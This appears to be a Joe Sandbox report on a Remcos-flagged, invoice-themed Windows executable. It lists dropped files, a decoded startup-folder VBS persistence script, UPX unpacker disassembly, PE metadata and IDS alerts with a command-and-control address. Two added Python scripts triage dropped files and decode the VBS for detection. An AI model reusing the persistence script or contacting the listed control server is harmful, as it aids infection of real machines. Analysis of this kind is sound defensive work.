                                                                          SSDEEP:12288:m0mJL7t81uJw6rSocqtehC7lYi6/MDFsc9XZ:mLtJw6LcDhC7lYiXXRZ
                                                                          MD5:FBBAB074EA1BC72A76E7E17D4546F64A
                                                                          SHA1:B7E164E3BD18C016F162808550B250EDDC9CCD46
                                                                          SHA-256:64ADDCBF4C12AF13CC30A75208952AB12B2A66CCEC42DD6D65297BD067733E54
                                                                          SHA-512:D4C3DCD1DDCB9D5BA519F71C49A4F63D72554930174F0C727A7F6D6CFA6E50ED3142DB7C84F666646FF45914A6A46F1A545577DFFAC6AD405BBDB206C41B8483
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:EA06.....X..Z}..W.T.W:.0.T.U9..kL.....2.1.L)..y....s.m..Y..iU......T.....%.^..).W4.[*r..ryM.U.6.D..s...X...>...i...~.L..3...~.~6........W.......-....W.x=...o.|.9^?..o.`....eI..a...n...uoX.wJ+......&.......&..s....,^.A..n.v....q.................-u......q.4u....7I.&.1.E&....T.s..6.J..*.J..f..Z`S..2...H. ..2aH......2.Z..h.Jd..w.Z]..S...:aH..r.......(..(`*..iS.eH..L..x........*....T.@1.6..>......Z.Y....UR.i..9.lrO\.P@..U...1.EZeS...|6...g..Te......Uf3."...Ng..H.g.r..o..D.]6..&...6.2......p.G..&..,.IB..... ..R.Ng...#S6......\j.B.J&.i.3as..13..2...F.`.?..ar........UJ.~.w`.Z.^...G*...b.S..0..D......tI.....h%.............aV..d..$Ze..D&..f{p...5i.W'.]j..M.Iq.....l.!1.],...+.R..~`.,"..rt..X....[`u..R.0.N.....Z..j.....k.S;.z..Q.Va4..^1P.@2.f&Am...3.-2.2..".M..-O.Dr.....5.q8.i..4.r<V..,...Fz...H...F.>..l-..F....K...G....pm@.GV...G...Gf.......F....t...9b.y.r$.@.B*......3..9...&....@..P..9...&.........9.....W.ri`.WggO.T.R...k.._j..V.cy.S&..m~-9.s.T..;.9.x<..\.AQ..
                                                                           Five further dropped-file entries written by C:\Users\user\AppData\Local\acceptancy\turbinals.exe repeat the record above exactly (File Type data, 423920 bytes, Entropy 7.985721489448969, Encrypted false, same SSDEEP, MD5 FBBAB074EA1BC72A76E7E17D4546F64A, SHA-256 64ADDCBF4C12AF13CC30A75208952AB12B2A66CCEC42DD6D65297BD067733E54, Malicious false, identical preview bytes): the process writes byte-identical copies of this one high-entropy blob.
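The dropped-file records above are worth reading against each other: a 423,920-byte file with entropy 7.9857 out of a possible 8.0 is, whatever the sandbox's own "Encrypted: false" heuristic says, statistically indistinguishable from compressed or encrypted data, and turbinals.exe writes byte-identical copies of it (same SHA-256) several times, which a per-path listing inflates into separate entries. The following is an added triage script, not part of the Joe Sandbox report, that reproduces the report's entropy and hash columns and collapses identical copies under one digest. The thresholds and the sample inputs are constructed for the example; they are stand-ins, not the real dropped bytes.

```python
"""Triage of a dropped-file listing like the one above: size, Shannon entropy
and SHA-256 per file, byte-identical copies collapsed under one digest.
Added example, not part of the Joe Sandbox report. The inputs are
constructed stand-ins for the dropped files, not their real bytes."""
import hashlib
import math
from collections import Counter, defaultdict

# Thresholds are assumptions for this example, not values taken from the report.
HIGH_ENTROPY = 7.9   # 8.0 is the ceiling for byte data; above ~7.9 means compressed or encrypted
TINY_BYTES = 16      # marker/flag files such as the 2-byte drop in the listing


def shannon_entropy(data: bytes) -> float:
    """Bits per byte on the 0..8 scale that the report calls 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def describe(data: bytes) -> dict:
    h = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": round(h, 4),
        "sha256": hashlib.sha256(data).hexdigest(),
        "high_entropy": h > HIGH_ENTROPY,
        "tiny": len(data) <= TINY_BYTES,
    }


def triage(dropped: dict) -> dict:
    """dropped maps path -> content. Returns one record per distinct SHA-256
    with every path that carried those bytes, so a blob written to several
    locations (as turbinals.exe does above) shows up once, with a count."""
    by_hash = defaultdict(list)
    for path, data in dropped.items():
        by_hash[hashlib.sha256(data).hexdigest()].append(path)
    records = {}
    for digest, paths in by_hash.items():
        rec = describe(dropped[paths[0]])
        rec["paths"] = sorted(paths)
        records[digest] = rec
    return records


# Constructed sample inputs (NOT the real dropped files):
#  - a deterministic pseudo-random blob standing in for the 423,920-byte
#    high-entropy 'data' file that the report lists repeatedly
#  - a 2-byte CRLF file, like the 2-byte drop
#  - a UTF-16LE script fragment, like the startup-folder VBS
_BLOB = hashlib.shake_256(b"constructed-example-seed").digest(16384)
SAMPLE_DROPS = {
    r"C:\Users\user\AppData\Local\acceptancy\one.dat": _BLOB,
    r"C:\Users\user\AppData\Local\acceptancy\two.dat": _BLOB,
    r"C:\Users\user\AppData\Roaming\three.dat": _BLOB,
    r"C:\Users\user\AppData\Roaming\empty.txt": b"\r\n",
    r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.vbs":
        'Set WshShell = CreateObject("WScript.Shell")\n'.encode("utf-16-le"),
}

if __name__ == "__main__":
    for digest, rec in triage(SAMPLE_DROPS).items():
        flags = [f for f in ("high_entropy", "tiny") if rec[f]] or ["-"]
        print(f"{digest[:16]}  {rec['size']:>7} B  H={rec['entropy']:.3f}  "
              f"x{len(rec['paths'])}  {','.join(flags)}")
```

Run against a real dropped-files directory, the dictionary would be filled from disk; the point of keying on SHA-256 rather than path is that the seven entries for the same 423,920-byte blob become one line with a copy count, which is the number that matters when deciding whether the blob is a staged payload.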
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb8da28c5, page size 32768, DirtyShutdown, Windows version 10.0
                                                                          Category:dropped
                                                                          Size (bytes):18874368
                                                                          Entropy (8bit):0.8289311070341717
                                                                          Encrypted:false
                                                                          SSDEEP:6144:oA/kqb7hP0u1fM1iM15Sd+qk5J/p1CUNL5NCAMPqpXqp5qpkQFeX+SQFFqpDvoQa:zD88+zewCevKKNb+EsUq3
                                                                          MD5:116BD981DB6B0DEA9E81FA21F0EF4FDE
                                                                          SHA1:6831393A305B9B6A5686054F09BB9F1838E26D2A
                                                                          SHA-256:507BD08B97D119B97B2AE44FAE592802394C90853DFBB8DD9AC0FBB1833B4E19
                                                                          SHA-512:8E50156797C0FC2E8201A34802E0B02F343F0FF51E4761F273251A76FD5A571CB1E354FED641D62D3C73D06CD4249D7DAD24FC42317CA1DA004C4D3068930083
                                                                          Malicious:false
                                                                          Preview:..(.... ....................1...{........................v..........{...(...|{.h.x..............................1...{..............................................................................................d...........eJ......n........................................................................................................... ............{..............................................................................................................................................................................................3....{.......................................(...|.4.................95..(...|{..........................#......h.x.....................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\z49FACTURA-0987678.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):492544
                                                                          Entropy (8bit):7.622274314987341
                                                                          Encrypted:false
                                                                          SSDEEP:12288:VqJQ9RCvyBggtP22gHqr2EzQuaKt4ZmQXvMhGaI:UsrmKzz9H4ZmQmI
                                                                          MD5:1D91EEEBB3B92B76F541713EF2BFD0EE
                                                                          SHA1:05A109DAAFCE3D39D6FB3B9E747614A1531F2890
                                                                          SHA-256:206627C14F57B9B6CE47B972DA9538C1FC4E941626B803ABE5C852E54F309795
                                                                          SHA-512:C55BC96B3DE8722E89217116A8B6959857C1BEB822BD95284789513B5FF88CA6EF4124156F7D212488249083505268CF68CE59DA729DD3B7378B030C89E98489
                                                                          Malicious:false
                                                                          Preview:.c.5OKZW4SDY..L0.S2S985L.ZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S98=MKZY/.JY.8...R~..l]%8z'B<#+4\lS)=\<M.W)k("^s-7uu.ch>]7\.8AA~W0SDYU1............x..U......._..._...<.o..y...co..p.m.I......l..z.........y...x...cs.....x.....#i..q.._j|.....F......kQV$....SDYU1L0H.wS9t4IK1..4DYU1L0HS.S;9>MEJWPVDYu3L0HS2i.;5L[ZW0#AYU1.0HC2S9:5LNZV0SDYU4L1HS2S98.KKZS0SDYU1N0H.2S)85\KZW0CDYE1L0HS2C985LKZW0SDYu.J0LR2S9X2L..W0SDYU1L0HS2S985LKZ.7S.bU1\.NS.S985LKZW0SDYU1L0HS2..>5TKZWx.BY.1L0HS2S985LK*R0.@YU1L0HS2S985LKZW0SDYU1L0HS.'\@ALKZJoVDYE1L0(V2S=85LKZW0SDYU1L0hS23.JQ-?;W0S.XU1<5HS.R98QIKZW0SDYU1L0HSrS9x.(*.60SD5.1L0HT2S785L.\W0SDYU1L0HS2Sy85.e($B0DYU..0HSRT98.LKZ.6SDYU1L0HS2S98uLK.yB6(661L.sS2S.?5LwZW0.CYU1L0HS2S985L.ZWrSDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDY
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):2
                                                                          Entropy (8bit):1.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:Qn:Qn
                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                          Malicious:false
                                                                          Preview:..
                                                                          Process:C:\Users\user\Desktop\z49FACTURA-0987678.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                          Category:dropped
                                                                          Size (bytes):875008
                                                                          Entropy (8bit):7.963510957506074
                                                                          Encrypted:false
                                                                          SSDEEP:24576:Zrl6kD68JmlotQf0hwmcZIR5MRsJOjOZW89S+7Ed7b:1l328U2yf0CmOeMRsnZW8o/h
                                                                          MD5:876F47F33C5975497C15BF24D50952B5
                                                                          SHA1:A47579EA0E5D47CEB89CBB3450F4C482768A0BF8
                                                                          SHA-256:49E8A1F12FB5202470604EFE01C0D60949D20D302A76AED85B2A049E91266366
                                                                          SHA-512:7346F82C0C7065D2DE4EC5D5747235CE0ADA6E799E6CF461A57CE15969CCD0BF92BF7D5EFB2E5B57AD4BE0DEFD3A716BDB6A8C609E0ABBE0FB3832F5CFBFD6C3
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 26%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Ng.........."......`..........Pz... ........@.......................................@...@.......@......................r..$...........................$v......................................4|..H...........................................UPX0....................................UPX1.....`... ...^..................@....rsrc................b..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):278
                                                                          Entropy (8bit):3.4189284708771144
                                                                          Encrypted:false
                                                                          SSDEEP:6:DMM8lfm3OOQdUfclq7UEZ+lX1ElGUM+GuipWBnriIM8lfQVn:DsO+vNlq7Q1ElPM+Gu6WRmA2n
                                                                          MD5:1A239AF3BBBAFDC8767CC356FA738C50
                                                                          SHA1:B6B8D28EDB7604591AC3CA133AC4CF55DC46B483
                                                                          SHA-256:A67FE1C9EFA3B289911C65D1807EFF06734825597AA74DEC91A2409B212168A8
                                                                          SHA-512:6E31005A250E98CC1C28C2E33F7687C310072BE104A10A486DF876FF3257E93217D060F41900644F6B120B2A0AC8EE7854C0BC935494D39EC9207CE7213376FD
                                                                          Malicious:true
                                                                           Preview (UTF-16LE text, decoded):
                                                                           Set WshShell = CreateObject("WScript.Shell")
                                                                           WshShell.Run "C:\Users\brok\AppData\Local\acceptancy\turbinals.exe", 1
                                                                           Set WshShell = Nothing
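The 278-byte VBS drop above is the persistence mechanism behind the "Drops VBS files to the startup folder" signature: three lines of UTF-16LE text that hand the turbinals.exe path to WScript.Shell.Run. Two details are worth a practitioner's attention. The path is hard-coded to the profile present at infection time (the script says C:\Users\brok\ even though the report masks process paths as C:\Users\user\), so the persistence is per-user and breaks if the profile is renamed. And the file is UTF-16LE without a BOM with LF line endings, which is exactly how 139 characters come to 278 bytes and why a naive UTF-8 grep for "WScript.Shell" finds nothing in it. The script below is an added example, not part of the Joe Sandbox report; SAMPLE_VBS is re-typed from the preview, and the list of user-writable directories it flags is an assumption made for this example.

```python
"""Decode a Startup-folder VBS dropper like the 278-byte one above and pull
out what it launches. Added example, not part of the Joe Sandbox report.
SAMPLE_VBS is re-typed from the report's preview (UTF-16LE, no BOM, LF line
endings); the list of user-writable directories is an assumption made for
this example."""
import re

# Parent directories a persisted binary should not normally live in
# (assumption for this example; lower-cased, backslash paths).
USER_WRITABLE_MARKERS = (
    "\\appdata\\local\\", "\\appdata\\roaming\\", "\\users\\public\\",
    "\\programdata\\", "\\temp\\",
)

RUN_CALL = re.compile(r'\.Run\s+"([^"]+)"(?:\s*,\s*(\d+))?', re.IGNORECASE)


def decode_vbs(raw: bytes) -> str:
    """Handle UTF-16LE with or without a BOM (file(1) reported the latter
    for this drop) and fall back to UTF-8 for plain ANSI scripts."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    if len(raw) % 2 == 0 and raw[1:2] == b"\x00":   # ASCII char followed by a NUL
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def extract_run_targets(script: str) -> list:
    """(command, window_style) for every WshShell.Run call; window style 1 is
    a normal visible window, 0 would be hidden."""
    return [(m.group(1), int(m.group(2)) if m.group(2) else None)
            for m in RUN_CALL.finditer(script)]


def is_user_writable(path: str) -> bool:
    p = path.lower().replace("/", "\\")
    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def analyze(raw: bytes) -> dict:
    script = decode_vbs(raw)
    targets = extract_run_targets(script)
    return {
        "script": script,
        "targets": targets,
        "suspicious": any(is_user_writable(cmd) for cmd, _ in targets),
    }


# Re-typed from the report's preview; the hard-coded profile path shows the
# persistence is bound to the user name present at infection time.
SAMPLE_VBS = (
    'Set WshShell = CreateObject("WScript.Shell")\n'
    'WshShell.Run "C:\\Users\\brok\\AppData\\Local\\acceptancy\\turbinals.exe", 1\n'
    'Set WshShell = Nothing\n'
).encode("utf-16-le")

if __name__ == "__main__":
    result = analyze(SAMPLE_VBS)
    print(result["script"])
    for cmd, style in result["targets"]:
        print(f"launches: {cmd}  (window style {style})  suspicious={is_user_writable(cmd)}")
```

The decode step is the part most often skipped in hunt queries: a rule that matches "WScript.Shell" as bytes will not fire on this file, so either decode before matching or also search for the UTF-16LE byte pattern.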
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                          Entropy (8bit):7.963510957506074
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.39%
                                                                          • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                          • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          File name:z49FACTURA-0987678.exe
                                                                          File size:875'008 bytes
                                                                          MD5:876f47f33c5975497c15bf24d50952b5
                                                                          SHA1:a47579ea0e5d47ceb89cbb3450f4c482768a0bf8
                                                                          SHA256:49e8a1f12fb5202470604efe01c0d60949d20d302a76aed85b2a049e91266366
                                                                          SHA512:7346f82c0c7065d2de4ec5d5747235ce0ada6e799e6cf461a57ce15969ccd0bf92bf7d5efb2e5b57ad4be0defd3a716bdb6a8c609e0abbe0fb3832f5cfbfd6c3
                                                                          SSDEEP:24576:Zrl6kD68JmlotQf0hwmcZIR5MRsJOjOZW89S+7Ed7b:1l328U2yf0CmOeMRsnZW8o/h
                                                                          TLSH:751523B4ADD5EC26E25C67B881398C8415E678339EC8771EC624F25FFC58303C84AA5E
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x557a50
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x674EF005 [Tue Dec 3 11:48:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: fc6683d30d9f25244a50fd5357825e79
                                                                          Instruction
                                                                          pushad
                                                                          mov esi, 00502000h
                                                                          lea edi, dword ptr [esi-00101000h]
                                                                          push edi
                                                                          jmp 00007F204CBACDBDh
                                                                          nop
                                                                          mov al, byte ptr [esi]
                                                                          inc esi
                                                                          mov byte ptr [edi], al
                                                                          inc edi
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          jc 00007F204CBACD9Fh
                                                                          mov eax, 00000001h
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          adc eax, eax
                                                                          add ebx, ebx
                                                                          jnc 00007F204CBACDBDh
                                                                          jne 00007F204CBACDDAh
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          jc 00007F204CBACDD1h
                                                                          dec eax
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          adc eax, eax
                                                                          jmp 00007F204CBACD86h
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          adc ecx, ecx
                                                                          jmp 00007F204CBACE04h
                                                                          xor ecx, ecx
                                                                          sub eax, 03h
                                                                          jc 00007F204CBACDC3h
                                                                          shl eax, 08h
                                                                          mov al, byte ptr [esi]
                                                                          inc esi
                                                                          xor eax, FFFFFFFFh
                                                                          je 00007F204CBACE27h
                                                                          sar eax, 1
                                                                          mov ebp, eax
                                                                          jmp 00007F204CBACDBDh
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          jc 00007F204CBACD7Eh
                                                                          inc ecx
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          jc 00007F204CBACD70h
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          adc ecx, ecx
                                                                          add ebx, ebx
                                                                          jnc 00007F204CBACDA1h
                                                                          jne 00007F204CBACDBBh
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          jnc 00007F204CBACD96h
                                                                          add ecx, 02h
                                                                          cmp ebp, FFFFFB00h
                                                                          adc ecx, 02h
                                                                          lea edx, dword ptr [edi+ebp]
                                                                          cmp ebp, FFFFFFFCh
                                                                          jbe 00007F204CBACDC0h
                                                                          mov al, byte ptr [edx]
                                                                          Programming Language:
                                                                          • [ASM] VS2013 build 21005
                                                                          • [ C ] VS2013 build 21005
                                                                          • [C++] VS2013 build 21005
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          • [ASM] VS2013 UPD4 build 31101
                                                                          • [RES] VS2013 build 21005
                                                                          • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1d7200 | 0x424 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x158000 | 0x7f200 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1d7624 | 0xc | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x157c34 | 0x48 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x101000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x102000 | 0x56000 | 0x55e00 | e4e90b309c98138c3969546fedea886e | False | 0.9871326874090247 | data | 7.935377881941457 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x158000 | 0x80000 | 0x7f800 | 1f8d90fd4dc042a0cba3387ad8fec4e8 | False | 0.9597675398284313 | data | 7.957214635968932 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1585ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0x1586d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0x158804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0x158930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0x158c1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0x158d48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0x159bf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0x15a4a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0x15aa0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0x15cfb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0x15e064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | empty | English | Great Britain | 0
RT_STRING | 0xcd4f0 | 0x594 | empty | English | Great Britain | 0
RT_STRING | 0xcda84 | 0x68a | empty | English | Great Britain | 0
RT_STRING | 0xce110 | 0x490 | empty | English | Great Britain | 0
RT_STRING | 0xce5a0 | 0x5fc | empty | English | Great Britain | 0
RT_STRING | 0xceb9c | 0x65c | empty | English | Great Britain | 0
RT_STRING | 0xcf1f8 | 0x466 | empty | English | Great Britain | 0
RT_STRING | 0xcf660 | 0x158 | empty | English | Great Britain | 0
RT_RCDATA | 0x15e4d0 | 0x78797 | data | | | 1.0003262655964074
RT_GROUP_ICON | 0x1d6c6c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1d6ce8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1d6d00 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1d6d18 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1d6d30 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1d6e10 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | GetAce
COMCTL32.dll | ImageList_Remove
COMDLG32.dll | GetOpenFileNameW
GDI32.dll | LineTo
IPHLPAPI.DLL | IcmpSendEcho
MPR.dll | WNetUseConnectionW
ole32.dll | CoGetObject
OLEAUT32.dll | VariantInit
PSAPI.DLL | GetProcessMemoryInfo
SHELL32.dll | DragFinish
USER32.dll | GetDC
USERENV.dll | LoadUserProfileW
UxTheme.dll | IsThemeActive
VERSION.dll | VerQueryValueW
WININET.dll | FtpOpenFileW
WINMM.dll | timeGetTime
WSOCK32.dll | connect
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-03T15:40:12.448808+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.10 | 49703 | 192.210.150.26 | 8787 | TCP
2024-12-03T15:40:13.609424+0100 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 192.210.150.26 | 8787 | 192.168.2.10 | 49703 | TCP
2024-12-03T15:40:16.569413+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.10 | 49710 | 178.237.33.50 | 80 | TCP
2024-12-03T15:42:38.466482+0100 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 192.210.150.26 | 8787 | 192.168.2.10 | 49703 | TCP
                                                                          Dec 3, 2024 15:40:15.825934887 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.832043886 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.832098961 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:15.832201958 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.837285995 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.837332010 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:15.837934971 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.842303991 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.842365026 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:15.842377901 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.847518921 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.847614050 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:15.848124027 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.852912903 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.853091955 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:15.853357077 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.857971907 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.858031988 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:15.989219904 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.989382982 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.989546061 CET497048787192.168.2.10192.210.150.26
